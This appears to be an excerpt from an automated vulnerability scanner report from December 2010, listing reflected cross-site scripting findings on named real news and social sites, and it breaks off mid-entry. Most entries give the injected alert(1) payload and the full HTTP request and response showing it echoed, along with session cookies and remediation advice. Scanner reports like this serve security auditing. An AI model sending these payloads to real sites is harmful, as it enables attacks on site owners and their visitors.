HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:28 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 200987 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ancialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Flightreading%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Account%3Dlightreading%26Page%3DQUOTE%26Ticker%3DT34d4f'-alert(1)-'7ce94fc805c&Type=page&Client=lightreading&rand=' + Math.random(); head.appendChild(script); </script> ...[SNIP]...
3.801. http://www.lightreading.com/quote.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/quote.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32721'-alert(1)-'01e5fd5bd42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quote.asp?32721'-alert(1)-'01e5fd5bd42=1 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:03:10 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 227823 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... text/javascript"; script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Flightreading%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%2632721'-alert(1)-'01e5fd5bd42%3D1&Type=page&Client=lightreading&rand=' + Math.random(); head.appendChild(script); </script> ...[SNIP]...
3.802. http://www.lightreading.com/resource-library.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/resource-library.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb3a1"><script>alert(1)</script>1677683f269 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resource-library.asp?fb3a1"><script>alert(1)</script>1677683f269=1 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:17:51 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:17:50 GMT Expires: Sun, 10 Apr 2011 19:17:50 GMT Etag: s200805.p200805 Content-Length: 189460 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... <a href="http://www.lightreading.com/resource-library.asp?fb3a1"><script>alert(1)</script>1677683f269=1&piddl_month=11&piddl_year=2010"> ...[SNIP]...
3.803. http://www.lightreading.com/topics.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/topics.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c046e"><script>alert(1)</script>4f099d1d545 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topics.asp?node_id=1341&c046e"><script>alert(1)</script>4f099d1d545=1 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:15:45 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:15:41 GMT Expires: Sun, 10 Apr 2011 19:15:41 GMT Etag: s200805.p200805 Content-Length: 269302 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... <a href="http://www.lightreading.com/topics.asp?node_id=1341&c046e"><script>alert(1)</script>4f099d1d545=1&piddl_archivepage_news=2#news"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ab56'-alert(1)-'e62ea93c15f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /groups5ab56'-alert(1)-'e62ea93c15f HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:9FD6K2cF_FOmRB9ssnuxVp2WmaaCztk92kPTo761VbOBPvUzydfF-2:1292112146:620c991f9b9360dc84c31de0689e6994aa0bf6c6"; Version=1; Max-Age=1799; Expires=Sun, 12-Dec-2010 00:32:25 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:7508638249675798537"; Version=1; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Set-Cookie: bcookie="v=1&35050c88-21bb-4ae8-81fb-52a1c401cb34"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 30-Dec-2078 03:16:33 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 972 Date: Sun, 12 Dec 2010 00:02:25 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1920bf45525d5f4f58455e445a4a4229a3;expires=Sun, 12-Dec-2010 00:32:10 GMT;path=/;httponly
The value of the videoId request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a6b26%3balert(1)//6156b49ff60 was submitted in the videoId parameter. This input was echoed as a6b26;alert(1)//6156b49ff60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /All_Previews.htm?videoId=626097310001a6b26%3balert(1)//6156b49ff60 HTTP/1.1 Host: www.pyr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 00:06:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 37139 Content-Type: text/html Cache-control: private
/* * feel free to edit these configurations * to modify the player experience */ config["videoId"] = 626097310001a6b26;alert(1)//6156b49ff60 //the default video loaded into the player config["videoRef"] = null; //the default video loaded into the player by ref id specified in console config["lineupId"] = null; //the default lineup load ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3ac1"-alert(1)-"9d26c73f74e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: briefingcenters.techweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ac1"-alert(1)-"9d26c73f74e Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 01:45:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 01:45:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=GVHYHWKU4GAVTQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 89129
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <!--SiteCatalyst code version: G.7. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -- ...[SNIP]...
var s_prop1=""; var s_prop2=""; var s_prop3=""; var s_prop4=""; var s_prop5=""; var s_prop6=""; var s_prop7=""; var s_prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ac1"-alert(1)-"9d26c73f74e"; var s_prop9=""; var s_prop10=""; var s_prop11=""; var s_prop12=""; var s_prop14=""; var s_prop15=""; var s_prop16=""; var s_prop19="False";
/* E-commerce Variables */ var s_campaign=""; ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c056d"-alert(1)-"f225b7c3bf8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /database_security/security/app-security/showArticle.jhtml HTTP/1.1 Host: darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c056d"-alert(1)-"f225b7c3bf8 Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 02:00:16 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Set-Cookie: PHPSESSID=4andi1thus96laev6juo0isrf5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=NGFuZGkxdGh1czk2bGFldjZqdW8waXNyZjU%3D; expires=Sun, 12-Dec-2010 02:02:16 GMT; path=/ Location: https://login.techweb.com/cas/login?service=http://www.darkreading.com/database_security/security/app-security/0&gateway=true Connection: close Content-Type: text/html Content-Length: 32675
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cfea"-alert(1)-"282bc47bf83 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /database_security/security/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3cfea"-alert(1)-"282bc47bf83
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:59:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=om92bqe7kbr2h56cl5g5quf931; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=b205MmJxZTdrYnIyaDU2Y2w1ZzVxdWY5MzE%3D; expires=Sun, 12-Dec-2010 02:01:55 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://www.darkreading.com/database_security/security/vulnerabilities/0&gateway=true
Connection: close
Content-Type: text/html
Content-Length: 32675
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a183"-alert(1)-"5c940400821 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: gamasutra.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7a183"-alert(1)-"5c940400821
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:55:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Connection: close
Content-Type: text/html
Content-Length: 109267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <script t ...[SNIP]... s.prop1=""; s.prop2=""; s.prop3="Gamasustra | | GAMASUTRA"; s.prop4="GAMASUTRA"; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7a183"-alert(1)-"5c940400821"; s.prop9=""; s.prop10=""; s.prop13="http://www.gamasutra.com/index.php"; /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events="event5"; s.products=""; s.purchaseID="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1004"-alert(1)-"e4efa87e6e4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: www.contentinople.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e1004"-alert(1)-"e4efa87e6e4
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:32:16 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 134188
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Advertising, AOL, Apple, Audio, Babelgum, Content Delivery Network (CDN), Disney, Digital ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e1004"-alert(1)-"e4efa87e6e4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbac"-alert(1)-"cbed3a67a32 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author.asp HTTP/1.1
Host: www.contentinople.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fbbac"-alert(1)-"cbed3a67a32
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:32:07 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 134182
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Advertising, AOL, Apple, Audio, Babelgum, Content Delivery Network (CDN), Disney, Digital ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fbbac"-alert(1)-"cbed3a67a32"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2f25"-alert(1)-"37a5d549da5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author.asp?section_id=440&doc_id=178256 HTTP/1.1
Host: www.contentinople.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d2f25"-alert(1)-"37a5d549da5
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:32:55 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
X-Pingback: http://www.lightreading.com/xmlrpc.asp
Content-Length: 93342
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Advertising, AOL, Apple, Audio, Babelgum, Content Delivery Network (CDN), Disney, Digital ...[SNIP]... Targeted Ad Product"; s.prop4="Canoe Shelves Targeted Ad Product"; s.prop5=""; s.prop6=""; s.prop7="Jeff Baumgartner"; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d2f25"-alert(1)-"37a5d549da5"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="20090618";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88437"-alert(1)-"b49e17ca852 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/ HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)88437"-alert(1)-"b49e17ca852
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa856"-alert(1)-"86db91f7b1a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700484/real-life-social-engineering.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa856"-alert(1)-"86db91f7b1a
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 665d1"-alert(1)-"c6d10119106 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700498/finding-exposed-devices-on-your-network.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)665d1"-alert(1)-"c6d10119106
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84036"-alert(1)-"d5c28c9e3d9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700510/relying-on-tools-makes-you-dumber.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)84036"-alert(1)-"d5c28c9e3d9
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Relying O ...[SNIP]... s Makes You Dumber"; s.prop4="Relying On Tools Makes You Dumber"; s.prop5="blog"; s.prop6=""; s.prop7="John H. Sawyer"; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)84036"-alert(1)-"d5c28c9e3d9"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21=""; /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73843"-alert(1)-"ff1f8c8dc8f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)73843"-alert(1)-"ff1f8c8dc8f
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e6e"-alert(1)-"6d7c7eb0628 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
